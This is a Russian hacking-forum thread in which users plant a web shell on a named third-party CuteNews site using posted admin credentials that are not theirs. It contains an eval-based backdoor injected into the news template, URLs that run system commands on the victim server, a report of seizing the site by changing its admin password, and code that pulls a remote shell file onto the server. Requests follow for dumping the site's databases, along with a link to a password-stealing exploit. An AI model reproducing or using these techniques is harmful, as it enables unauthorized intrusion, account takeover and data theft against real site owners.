Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Shell CuteNews 1.4.5 Help! (https://forum.antichat.xyz/showthread.php?t=84299)

myrz 10.09.2008 15:30

Shell CuteNews 1.4.5 Help!
 
Всем привет!
Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен :)
Вот куда я хочу залить шелл.
_ttp://la2.no-ip.org/news/
Login: dsl
Password: 79513159

Заранее спасибо.

Astn 10.09.2008 15:32

Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.

aka PSIH 10.09.2008 15:48

скока писали уже про это...

1. Настройкa блока новостей -> Редактировать шаблоны
Добавляем в конец
Цитата:

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
сохраняем
2.
_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);

p.s: там Windows...

myrz 10.09.2008 15:59

Дело в том что я делаю так.
Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


Редактируйте Части Шаблона

Активные новости
Полная версия
Комментарии
Форма добавления комментариев
Предыдущая & Следующая(новости)
Предыдущая & Следующая(коментарий)

Жму Активные новости

Там открывается окошко с следущим содержанием

Цитата:

<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>
Я дописываю
Цитата:

HTML; if(isset($_GET['shell'])) eval($_GET['shell']);
Получается так

Цитата:

<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>
HTML; if(isset($_GET['shell'])) eval($_GET['shell']);
Потом захожу из этих сылоку куданить

Цитата:

_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);
Мне выдаёт ошибку мол

Цитата:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in F:\site\www\news\data\Default.tpl on line 11
Что делать ваще незнаю :(

myrz 10.09.2008 16:02

Сайт работает и я чуствую что он даже меня переживёт (((

myrz 10.09.2008 16:04

ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((

Rebz 10.09.2008 16:04

А ты смельчак выкладывать логин и пароль в открытый доступ..

myrz 10.09.2008 16:04

Это не мой :)))

aka PSIH 10.09.2008 16:09

http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
http://la2.no-ip.org/news/show_news.php?shell=system(dir);

все работает, пароль от админки я сменил, и т.к ты уже стучишся в аську ), я его тебе туда отправил...

myrz 10.09.2008 16:20

М возник еще вопрос.
Дело в том что мне надо слить их базы.
Даныые базы хронятся тут
Цитата:

http://la2.no-ip.org/config/config.php
Как организовать это скажите плиз.

n-000 10.09.2008 16:25

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему

myrz 10.09.2008 16:55

Цитата:

Сообщение от n-000
Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему

Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?

warlok 26.09.2008 15:07

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

DJ ][akep 26.09.2008 21:40

Цитата:

Сообщение от warlok
подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

:D
Это все знают, ток проблемы от базы пасы узнать ;) :)

warlok 28.09.2008 02:05

а конфиг сложно посмотреть ? =\

NamahS 11.11.2008 12:40

Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);


ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):
Цитата:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1 Parse error: syntax error, unexpected $end in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1

NamahS 11.11.2008 18:47

Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?

NamahS 13.11.2008 10:40

Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...

NamahS 20.11.2008 09:41

Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)

DJ ][akep 21.11.2008 12:24

Ну ппц :) Я ж писал уже...
Дописываем в конце Active News:
Цитата:

HTML;
$data=implode('',file('http://game2v.narod.ru/shell.php.txt'));
$fp=fopen('./sk.php','wb');
fputs($fp,$data);
fclose($fp);
Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...

NamahS 22.11.2008 13:46

Цитата:

Сообщение от DJ ][akep
Ну ппц :)

:) Я ж писал, что нет возможности выполнить XSS)))....Но все зер ГУД)...Через Чары проблему решил)

Assembler 10.02.2009 21:36

Народ не подскажете как пасс достать админа в кут нюс, эксплоит или че нить, ссылочку =)

warlok 10.02.2009 21:43

http://www.milw0rm.com/exploits/4779


Время: 14:24